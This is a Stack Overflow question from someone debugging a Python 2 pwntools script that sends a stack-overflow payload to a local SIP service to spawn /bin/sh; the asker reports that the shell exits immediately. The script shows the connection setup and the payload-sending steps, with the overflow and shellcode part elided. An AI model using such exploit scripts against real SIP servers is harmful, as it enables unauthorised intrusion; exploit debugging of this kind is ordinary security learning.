# I run a stack overflow exploit script written in python2 to execute the shellcode (/bin/sh), the victim program runs /bin/sh and exits immediately

Tags: gdb

I use gdb -p `pidof test` to access gdb for debugging
The results are shown in the figure
[gdb](https://i.stack.imgur.com/luhfE.png)
and [Meanwhile the python scripts are running](https://i.stack.imgur.com/ixQqI.png)

I don't know why the new process exits immediately. I would appreciate it if you could give me some ideas or solutions for troubleshooting

```py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import socket
import ssl
import re
import md5
import os
import uuid
from pwn import *
context(log_level='debug',arch='amd64',os='linux')

PROTO = "udp"
SERVER_IP = "127.0.0.1"
SERVER_PORT = 5060
USERNAME = "3000"
PASSWORD = "3000"
SUBSCRIBE_USERNAME = "3000"

# default to SIP TCP
socktype = socket.SOCK_STREAM
if PROTO == "udp":
    socktype = socket.SOCK_DGRAM
sock = socket.socket(socket.AF_INET, socktype)
if PROTO == "tls":
    sock = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1)

sock.connect((SERVER_IP, SERVER_PORT))
sh = remote.fromsocket(sock)

......
    
    sh.sendline(newmsg)
    sh.interactive()
    os.system("cat")
```